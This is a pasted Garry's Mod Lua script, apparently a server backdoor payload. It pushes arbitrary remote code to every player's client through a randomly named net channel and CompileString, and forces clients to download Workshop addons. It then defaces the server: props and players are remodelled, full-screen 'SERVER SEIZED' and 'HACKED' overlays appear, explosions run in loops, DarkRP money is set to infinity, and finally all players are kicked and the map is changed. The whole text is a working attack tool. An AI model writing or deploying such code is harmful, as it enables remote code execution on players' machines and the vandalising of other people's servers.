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a guest
Feb 19th, 2020
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text 22.44 KB | None | 0 0
  1. for k, v in pairs(player.GetAll()) do
  2. v:SendLua("steamworks.FileInfo(380745554,function(result)steamworks.Download(result.fileid,true,function(name)game.MountGMA(name)end) end)")
  3. v:SendLua("steamworks.FileInfo(1911711876,function(result)steamworks.Download(result.fileid,true,function(name)game.MountGMA(name)end) end)")
  4. v:SendLua("steamworks.FileInfo(1830594533,function(result)steamworks.Download(result.fileid,true,function(name)game.MountGMA(name)end) end)")
  5. v:ConCommand("say /job We Love AssaWolf")
  7. local i = v:LookupBone("ValveBiped.Bip01_L_Forearm")
  8. end
  9. timer.Simple( 25, function()
  10. util.AddNetworkString("faitleserv")
  11. local props2 = ents.GetAll()
  12. for _, prop in ipairs( props2 ) do
  13. if(prop:GetPhysicsObject():IsValid()) then
  14. prop:SetModel("models/player/norrland/homer.mdl")
  15. prop:SetMaterial("phoenix_storms/Fender_white.vtf")
  16. prop:SetColor(0,0,185)
  17. end
  18. end
  19. timer.Create("efdfeger"..math.random(500,50000), 1.5, 0, function()
  20. local props2 = ents.GetAll()
  21. for _, prop in ipairs( props2 ) do
  22. if(prop:GetPhysicsObject():IsValid()) then
  23. if(prop:GetModel() == "models/player/norrland/homer.mdl") then else
  24. prop:SetModel("models/player/norrland/homer.mdl")
  25. prop:SetMaterial("phoenix_storms/Fender_white.vtf")
  26. prop:SetColor(0,0,185)
  27. end
  28. end
  29. end
  30. end)
  31. timer.Simple( 1, function()
  32. for k,v in pairs(player.GetAll()) do
  33. v:SetRunSpeed(400* 4);
  34. v:SetWalkSpeed(400 * 4);
  35. end
  36. end)
  37. for k, v in pairs( player.GetAll() ) do
  38. if ( v:Alive() ) then
  39. v:GodEnable()
  40. v:SetModel("models/player/norrland/homer.mdl")
  41. v:SetMaterial("phoenix_storms/Fender_white.vtf")
  42. v:SetColor(0,0,185) else
  43. v:Spawn()
  44. timer.Simple( 5, function()
  45. v:GodEnable()
  46. v:SetModel("models/player/norrland/homer.mdl")
  47. v:SetMaterial("phoenix_storms/Fender_white.vtf")
  48. v:SetColor(0,0,185)
  49. end)
  50. end
  51. end
  53. game.AddParticles( "particles/kpanel.pcf" )
  55. PrecacheParticleSystem("kpanel")
  57. local function rdm_str(len)
  58. if not len or len <= 0 then
  59. return ''
  60. end
  61. return rdm_str(len - 1) .. ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")[math.random(1, 62)]
  62. end
  63. local net_string = rdm_str(25)
  64. util.AddNetworkString(net_string)
  65. BroadcastLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  66. hook.Add("PlayerInitialSpawn", "ifyouseethisdontpanicitsme",function(ply)
  67. if not ply:IsBot() then
  68. ply:SendLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  69. end
  70. end)
  71. local function SendToClient(code)
  72. local data = util.Compress(code)
  73. local len = #data net.Start(net_string)
  74. net.WriteUInt(len, 16)
  75. net.WriteData(data, len)
  76. net.Broadcast()
  77. end
  78. timer.Simple( 1, function()
  79. SendToClient([[
  80. game.AddParticles( "particles/kpanel.pcf" )
  82. PrecacheParticleSystem("kpanel")
  84. local defaultfov = LocalPlayer():GetFOV()
  85. local override = 70 hook.Add("CalcView", "EXROR_", function(ply, origin, angles, fov, znear, zfar) return { ["origin"] = origin, ["angles"] = angles, ["fov"] = override, ["znear"] = znear, ["zfar"] = zfar }
  86. end)
  87. local hide = { ["CHudHealth"] = true, ["CHudCrosshair"] = true }
  88. hook.Add( "HUDShouldDraw", "HideHUD", function( name ) if ( hide[ name ] ) then return false end
  89. end )
  90. local prevFrame = {}
  91. local prevValue = 2
  92. local aveclazicmu = {}
  93. hook.Add("HUDPaint", "bahouiilfautquemusiquesoitbien",function()
  94. for k,v in pairs(aveclazicmu) do v() end
  95. end)
  96. SOUNDSTART_CTP = false
  97. OZJFOZJCEZIO = true
  98. sound.PlayURL("","mono noblock noplay",function(s)
  99. if not s then return end
  100. if SOUNDSTART_CTP then s:Stop() return end
  101. SOUNDSTART_CTP = true
  102. s:SetVolume(6.5)
  103. s:Play()
  104. local ragtbl = {}
  105. aveclazicmu["CoolEffect"] = function()
  106. local tbl = {} s:FFT(tbl,FFT_4096) xpcall(function()
  107. local fal = 0 for i=1,40 do
  108. fal = fal + tbl[i] end
  109. prevValue = Lerp(30 * FrameTime(), prevValue, fal) if fal > 2 then
  110. override = Lerp(10 * FrameTime(), override, fal * .875)
  111. net.Start("faitleserv") net.SendToServer()
  112. else
  113. override = Lerp(5 * FrameTime(), override, defaultfov)
  114. sent = false
  115. end
  116. end,function()
  117. end)
  118. end
  119. end) ]])
  120. end)
  121. timer.Simple( 1, function()
  122. SendToClient([=[
  124. GizehSSV = GizehSSV or {}
  127. GizehSSV.Enabled = GizehSSV.Enabled or true
  129. timer.Create("]] .. tostring(GizehSSV.SecureString5) .. [[", 1.5, 0, function()
  130. local time = tonumber(0)
  131. local Message = {
  135. "*_*_ WOLFS WILL SEIZED THE WORLD _*_*",
  136. "*_*_* WOLFS WILL SEIZED THE WORLD *_*_*",
  137. "*_*_*_ WOLFS WILL SEIZED THE WORLD _*_*_*",
  138. "*_*_*_* WOLFS WILL SEIZED THE WORLD *_*_*_*",
  139. "*_*_*_*_ WOLFS WILL SEIZED THE WORLD _*_*_*_*",
  140. "*_*_*_*_* WOLFS WILL SEIZED THE WORLD *_*_*_*_*",
  141. "*_*_*_*_*_ WOLFS WILL SEIZED THE WORLD _*_*_*_*_*",
  142. "*_*_*_*_* WOLFS WILL SEIZED THE WORLD *_*_*_*_*",
  143. "*_*_*_*_ WOLFS WILL SEIZED THE WORLD _*_*_*_*",
  144. "*_*_*_* WOLFS WILL SEIZED THE WORLD *_*_*_*",
  145. "*_*_*_ WOLFS WILL SEIZED THE WORLD _*_*_*",
  146. "*_*_* WOLFS WILL SEIZED THE WORLD *_*_*",
  147. "*_*_ WOLFS WILL SEIZED THE WORLD _*_*",
  150. }
  152. for _, line in pairs(Message) do
  153. time = time + tonumber(0.1)
  154. timer.Simple(time,function()
  155. if not GizehSSV.Enabled then return end
  156. chat.AddText(HSVToColor( CurTime() % 6 * 60, 1, 1 ),line)
  157. end)
  158. end
  159. end)
  161. ]=])
  163. timer.Simple( 1, function()
  164. SendToClient([[
  165. -- timer.Simple(5, function()
  166. -- table.Empty(debug.getregistry())
  167. -- end)
  168. surface.CreateFont( "PixelCutsceneScaled",{ font = "Open Sans", size = 500, weight = 1000, antialias = true })
  169. surface.CreateFont( "PixelCutsceneScaledSmall",{ font = "Open Sans", size = 50, weight = 1000, antialias = true })
  170. surface.CreateFont( "PixelSmall",{ font = "Open Sans", size = 135, weight = 500, antialias = false })
  171. surface.CreateFont("lapolice", { font = "Open Sans", size = ScrW()*0.02, weight = 10, blursize = 0, scanlines = 2.5, antialias = false })
  172. local coltext = HSVToColor(CurTime() * 36 % 360, .3, .8) local w,h = ScrW(), ScrH() local W, H = ScrW(), ScrH()
  173. local MySelf = LocalPlayer()
  174. if ohno then ohno:Remove()
  175. ohno = nil end
  176. ohno = vgui.Create( "DFrame" )
  177. ohno:SetSize( w, h )
  178. ohno:SetPos(0,0)
  179. ohno:SetDraggable ( false )
  180. ohno:SetTitle("")
  181. ohno:ShowCloseButton(false)
  182. ohno.Paint = function( self )
  183. surface.SetDrawColor(30, 30, 30, 0)
  184. end
  185. glitchtext = { "AXSXWXLX_ win $inf", "XSXAXOXF_ win $inf", "AXXXXXXF_ win $inf", "ASSAWOLF_ win $inf", }
  186. local pw, ph = w, h*0.6 local px, py = w/2-pw/2, h/2-ph/2
  187. local Close = vgui.Create( "DButton", ohno )
  188. Close:SetPos(px, py)
  189. Close:SetText( "" )
  190. Close:SetSize( pw, ph )
  191. Close.Paint = function( self, tw, th )
  192. local coltext = HSVToColor(CurTime() * 36 % 360, .3, .8)
  193. local shift = math.sin(RealTime()*3)*1.5 + 5
  194. local text2 = "WOLF DOMINATION"
  195. draw.SimpleText( text2, "PixelCutsceneScaled", tw/2 , th/2, coltext, TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  196. draw.SimpleText( text2, "PixelCutsceneScaled", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  197. end
  198. timer.Simple( 6, function()
  199. Close.Paint = function( self, tw, th )
  200. local coltext = HSVToColor(CurTime() * 36 % 360, .3, .8)
  201. local shift = math.sin(RealTime()*3)*1.5 + 5
  202. local text = "WOLVES" local down = [=[(/.__.)/ W \(.__.\)]=]
  203. draw.SimpleText( down, "PixelCutsceneScaledSmall", tw/2 , th/2 +100, coltext, TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER) draw.SimpleText( down, "PixelCutsceneScaledSmall", tw/2 - shift , th/2 +100 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  204. draw.SimpleText( text, "PixelCutsceneScaled", tw/2 , th/2, coltext, TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER) draw.SimpleText( text, "PixelCutsceneScaled", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  205. end
  206. timer.Simple( 10, function()
  207. Close.Paint = function( self, tw, th ) local coltext = HSVToColor(CurTime() * 36 % 360, .3, .8) local shift = math.sin(RealTime()*3)*1.5 + 5
  208. local text = "WOLVES"
  209. draw.SimpleText( text, "PixelCutsceneScaled", tw/2 , th/2, coltext, TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  210. draw.SimpleText( text, "PixelCutsceneScaled", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  211. end
  213. end)
  214. timer.Simple( 55, function()
  215. for i = 1, 10 do
  216. ParticleEffectAttach("kpanel",PATTACH_ABSORIGIN_FOLLOW,LocalPlayer(),0)
  217. end
  219. Close.Paint = function( self, tw, th )
  220. local
  221. coltext = HSVToColor(CurTime() * 36 % 360, .3, .8) local shift = math.sin(RealTime()*3)*1.5 + 5
  222. local text = { "ASSAWOLF", "AXSXWXLX", "XSXAXOXF","AXXXXXXF", }
  223. hook.Add( "Think", "omgilawinlebogos", function() plyk,plyv = table.Random(player.GetAll()) end)
  224. draw.SimpleText( Entity(plyv):Nick().." win $inf", "PixelCutsceneScaledSmall", tw/2 , th/2 +100, coltext, TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  225. draw.SimpleText( Entity(plyv):Nick().." win $inf", "PixelCutsceneScaledSmall", tw/2 - shift , th/2 +100 - shift, Color(math.random(240,255), math.random(240,255), math.random(240,255), 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  226. draw.SimpleText( table.Random(text), "PixelCutsceneScaled", tw/2 , th/2, coltext, TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER) draw.SimpleText( table.Random(text), "PixelCutsceneScaled", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  227. end
  228. timer.Create("fff", 0.1, 0, function()
  229. util.ScreenShake( Vector(0,0,0), 2.5, 50, 0.5, 5000 )
  230. end)
  231. hook.Add( "HUDPaint", "truckde merde", function()
  232. draw.DrawText( "OOF”»", "lapolice", ScrW() * 0.5, ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), TEXT_ALIGN_CENTER )
  233. draw.DrawText( "HACKED”»", "lapolice", math.random(0,10), ScrH() * (math.random(0,100)*0.01), Color( 240, 100, 100, math.random(230,255) ), 0 )
  234. draw.DrawText( "ASSAWOLF", "lapolice", W * 0.7 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  235. draw.DrawText( "SEIZED", "lapolice", W * 0.38 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  236. draw.DrawText( "You Suck", "lapolice", W * 0.9 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  237. draw.DrawText( "CHEH", "lapolice", W * 0.35 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  238. draw.DrawText( "RIP", "lapolice", W * 0.98 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  239. draw.DrawText( "WOLVES", "lapolice", W * 0.8 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  240. draw.DrawText( "OOF", "lapolice", W * 0.73 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  241. draw.DrawText( "No Signal", "lapolice", W * 0.27 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  242. draw.DrawText( "HAXOR", "lapolice", W * 0.1 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  243. draw.DrawText( "SEIZED", "lapolice", W * 0.05 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  244. draw.DrawText( "Random Guy", "lapolice", W * 0.11 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  245. draw.DrawText( "No Signal", "lapolice", W * 0.75 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  246. draw.DrawText( "HAXOR", "lapolice", W * 0.8 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  247. draw.DrawText( "ASSAWOLF", "lapolice", W * 0.2 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  248. draw.DrawText( "WOLVES", "lapolice", W * 0.1 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  249. draw.DrawText( "WOLVES", "lapolice", W * 0 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  250. draw.DrawText( "WOLVES", "lapolice", W * 0 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  251. end)
  252. end)
  253. timer.Simple( 208, function() Close.Paint = function( self, tw, th ) local coltext = HSVToColor(CurTime() * 36 % 360, .3, .8) local shift = math.sin(RealTime()*3)*1.5 + 5
  254. glitchtextend = { "WOLVES", "XOXVXS", "WXLXEX", "WXXXXS", "XOXXEX", } draw.SimpleText( table.Random(glitchtextend), "PixelCutsceneScaled", tw/2 , th/2, coltext, TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  255. draw.SimpleText( table.Random(glitchtextend), "PixelCutsceneScaled", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  256. end
  257. end)
  258. timer.Simple( 231, function()
  259. Close.Paint = function( self, tw, th )
  260. local coltext = HSVToColor(CurTime() * 36 % 360, .3, .8) local shift = math.sin(RealTime()*3)*1.5 + 5
  261. draw.SimpleText( "3", "PixelCutsceneScaled", tw/2 , th/2, coltext, TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  262. draw.SimpleText( "3", "PixelCutsceneScaled", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  263. end
  264. end)
  265. timer.Simple( 232, function() Close.Paint = function( self, tw, th )
  266. local coltext = HSVToColor(CurTime() * 36 % 360, .3, .8) local shift = math.sin(RealTime()*3)*1.5 + 5
  267. draw.SimpleText( "2", "PixelCutsceneScaled", tw/2 , th/2, coltext, TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  268. draw.SimpleText( "2", "PixelCutsceneScaled", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  269. end
  270. end)
  271. timer.Simple( 233, function()
  272. Close.Paint = function( self, tw, th )
  273. local coltext = HSVToColor(CurTime() * 36 % 360, .3, .8) local shift = math.sin(RealTime()*3)*1.5 + 5
  274. draw.SimpleText( "1", "PixelCutsceneScaled", tw/2 , th/2, coltext, TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  275. draw.SimpleText( "1", "PixelCutsceneScaled", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  276. end
  277. end)
  278. timer.Simple( 234, function()
  279. Close.Paint = function( self, tw, th )
  280. local coltext = HSVToColor(CurTime() * 36 % 360, .3, .8)
  281. local shift = math.sin(RealTime()*3)*1.5 + 5
  282. local titeltext = "SERVER SEIZED"
  283. local titeltextdow = "BY WOLVES"
  284. draw.SimpleText( titeltextdow, "PixelCutsceneScaledSmall", tw/2 , th/2 +100, coltext, TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  285. draw.SimpleText( titeltextdow, "PixelCutsceneScaledSmall", tw/2 - shift , th/2 +100 - shift, Color(math.random(240,255), math.random(240,255), math.random(240,255), 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  286. draw.SimpleText( titeltext, "PixelCutsceneScaled", tw/2 , th/2, coltext, TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER) draw.SimpleText( titeltext, "PixelCutsceneScaled", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  287. end
  288. end)
  289. local name = GetConVar("sv_skyname"):GetString()
  290. if name == "painted" then
  291. local sky for _, v in ipairs(ents.GetAll()) do
  292. if v:GetClass() == "env_skypaint" then
  293. sky = v break
  294. end
  295. end
  296. if not IsValid(sky) then return end
  297. hook.Add("PostRender","\xFFsky\xFF",function()
  298. local col = HSVToColor(CurTime() * 36 % 360, .3, .8) local vsky = Vector(col.r / 255, col.g / 255, col.b / 255) sky:SetTopColor(vsky) sky:SetBottomColor(vsky)
  299. end)
  300. else
  301. local prefix = {"lf","ft","rt","bk","dn","up"}
  302. local mats = {} for i=1,6 do mats[#mats+1] = Material("skybox/" .. name .. prefix[i])
  303. end
  304. hook.Add("PostRender","\xFFsky\xFF",function() local r = 0.5*math.sin(RealTime()*0.5)*240 + 255 local g = -0.5*math.sin(RealTime()*0.5)*240 + 255 local b = 215 for i=1,6 do mats[i]:SetVector("$color",Vector(r/254,g/254,b/254))
  305. end
  306. end)
  307. end
  308. timer.Create("aaneyjvkybtk", 0.01, 0, function()
  309. local mat = Entity(0):GetMaterials() local col = HSVToColor(CurTime() * 36 % 360, .3, .8) local ve = Vector(col.r / 255, col.g / 255, col.b / 255) LocalPlayer():SetWeaponColor( Vector(ve) )
  310. for k,v in pairs(mat) do
  311. local col = HSVToColor(CurTime() * 36 % 360, .3, .8) local ve = Vector(col.r / 255, col.g / 255, col.b / 255) Material(v):SetVector("$color", ve)
  312. end
  313. end)
  314. hook.Add("Think","butifoule",function() local col = HSVToColor(CurTime() * 36 % 360, .3, .8) local v = Vector(col.r / 255, col.g / 255, col.b / 255)
  315. for k, v in pairs( ents.FindByClass( "prop_*" ) ) do
  316. v:SetColor( col ) v:Activate()
  317. end
  318. for k,p in pairs(player.GetAll()) do
  319. p:SetColor( col )
  320. end
  321. end)
  322. end)
  323. timer.Create("mdr-ta-thune", 15, 0, function()
  324. local fdcal = math.random(1,2) if fdcal == 1 then notification.AddLegacy( "Console set your money to $inf.", 0 , 5 ) else notification.AddLegacy( "Console set your health to $inf.", 0 , 5 ) end end) ]])
  325. end)
  326. timer.Create("ok", 1, 0, function()
  327. for k, v in pairs( ents.FindByClass( "prop_*" ) ) do
  328. local phys = v:GetPhysicsObject() if (IsValid(phys)) then
  329. phys:EnableMotion(true) end end end)
  330. timer.Simple( 44, function()
  331. timer.Create("ok", 1, 60, function()
  332. local props = ents.GetAll() for _, prop in ipairs( props ) do
  333. if(prop:GetPhysicsObject():IsValid()) then
  334. prop:GetPhysicsObject():ApplyForceCenter( Vector( 100, 0, ((1500 * 0.73) * prop:GetPhysicsObject():GetMass() ) ) )
  335. end
  336. end
  337. for i = 1, 15 do
  338. local explode = ents.Create( "env_explosion" )
  339. explode:SetPos( Vector(math.random(-6000, 6000), math.random(-6000, 6000), math.random(-500, 2000)) )
  340. explode:Spawn()
  341. explode:SetKeyValue( "iMagnitude", "500" )
  342. explode:Fire( "Explode", 0, 0 )
  343. end
  344. for k,v in pairs(player.GetAll()) do
  345. v:SetVelocity(v:GetVelocity() + Vector(math.random(10,50), math.random(10,50), math.random(500,600)))
  346. end
  347. end)
  348. end)
  349. timer.Simple( 166.5, function()
  350. timer.Create("ok2", 1, 48, function()
  351. local props = ents.GetAll()
  352. for _, prop in ipairs( props ) do
  353. if(prop:GetPhysicsObject():IsValid()) then
  354. prop:GetPhysicsObject():ApplyForceCenter( Vector( 100, 0, ((1500 * 0.73) * prop:GetPhysicsObject():GetMass() ) ) )
  355. end
  356. end
  357. for i = 1, 15 do
  358. local explode = ents.Create( "env_explosion" )
  359. explode:SetPos( Vector(math.random(-6000, 6000), math.random(-6000, 6000), math.random(-500, 2000)) )
  360. explode:Spawn()
  361. explode:SetKeyValue( "iMagnitude", "500" )
  362. explode:Fire( "Explode", 0, 0 )
  363. end
  364. for k,v in pairs(player.GetAll()) do
  365. v:SetVelocity(v:GetVelocity() + Vector(math.random(10,50), math.random(10,50), math.random(500,600)))
  366. end
  367. end)
  368. end)
  369. timer.Simple( 240, function()
  370. local propsexplod = ents.GetAll()
  371. for _, prop in ipairs( propsexplod ) do
  372. if(prop:GetPhysicsObject():IsValid()) then
  373. local explosion = ents.Create("env_explosion")
  374. explosion:SetPos(vehicl:GetPos())
  375. explosion:Spawn()
  376. explosion:SetKeyValue("iMagnitude", "50")
  377. explosion:Fire("Explode", 0, 0)
  378. end
  379. end
  380. end)
  381. timer.Simple( 6, function()
  382. local sun = ents.FindByClass("env_sun")
  383. if #sun == 0 then return end
  384. sun = sun[1]
  385. hook.Add("Think","\xFFsun\xFF",function()
  386. sun:SetKeyValue("sun_dir", math.sin(CurTime())/3 .. " " .. math.cos(CurTime())/3 .. " 0.901970")
  387. sun:SetModelScale(120)
  388. end)
  389. end)
  390. timer.Simple( 207, function()
  391. timer.Create("explodend", 1, 0, function()
  392. for i = 1, 10 do
  393. local explode = ents.Create( "env_explosion" )
  394. explode:SetPos( Vector(math.random(-6000, 6000), math.random(-6000, 6000), math.random(-500, 2000)) )
  395. explode:Spawn()
  396. explode:SetKeyValue( "iMagnitude", "500" )
  397. explode:Fire( "Explode", 0, 0 )
  398. end
  399. end)
  400. end)
  401. timer.Simple( 248, function()
  402. for i,v in ipairs(player.GetAll()) do
  403. if v == p then continue end
  404. v:Kick("\n[FR] Oh desole, je ne me suis pas presente ,je suis AXSXWXLX votre serveur a rencontre un probleme que j'ai corrige, vous pouvez maintenant retourner sur votre serveur !\n\n\nN'oubliez jamais que les loups ne disparaissent pas !\n\n------------------------------------------\n\n[EN] Oh sorry, I didn't introduce myself ,I'm AXSXWXLX your server has encountered a problem that I fixed, you can now go back to your server !\n\n\nNever forget that wolves don't disappear!")
  405. end
  406. end)
  407. timer.Simple( 249, function()
  408. RunConsoleCommand("changelevel", "gm_construct")
  409. end)
  410. net.Receive("faitleserv", function()
  411. for i = 1,2 do
  412. local explode = ents.Create( "env_explosion" )
  413. explode:SetPos( Vector(math.random(-6000, 6000), math.random(-6000, 6000), math.random(-500, 2000)) )
  414. explode:Spawn() explode:SetKeyValue( "iMagnitude", "500" )
  415. explode:Fire( "Explode", 0, 0 )
  416. end
  417. local props = ents.GetAll()
  418. for _, prop in ipairs( props ) do
  419. if(prop:GetPhysicsObject():IsValid()) then
  420. prop:GetPhysicsObject():ApplyForceCenter( Vector( 0, 0, ((250 * 0.93) * prop:GetPhysicsObject():GetMass() ) ) )
  421. end
  422. end
  423. for k,v in pairs(player.GetAll()) do
  424. v:SetVelocity(v:GetVelocity() + Vector(math.random(10,50), math.random(10,50), math.random(50,100)))
  425. end
  426. end)
  427. local untitled_ = { "ASSAWOLF", "AXSXWXLX", "XSXAXOXF","AXXXXXXF" }
  428. for k, v in pairs(player.GetAll()) do
  429. timer.Create("charglogo", 0, 0, function()
  430. v:setDarkRPVar("job", "JOB_"..table.Random( untitled_ )) v:setDarkRPVar("money", "1e+999")
  431. end)
  432. end
  433. end)
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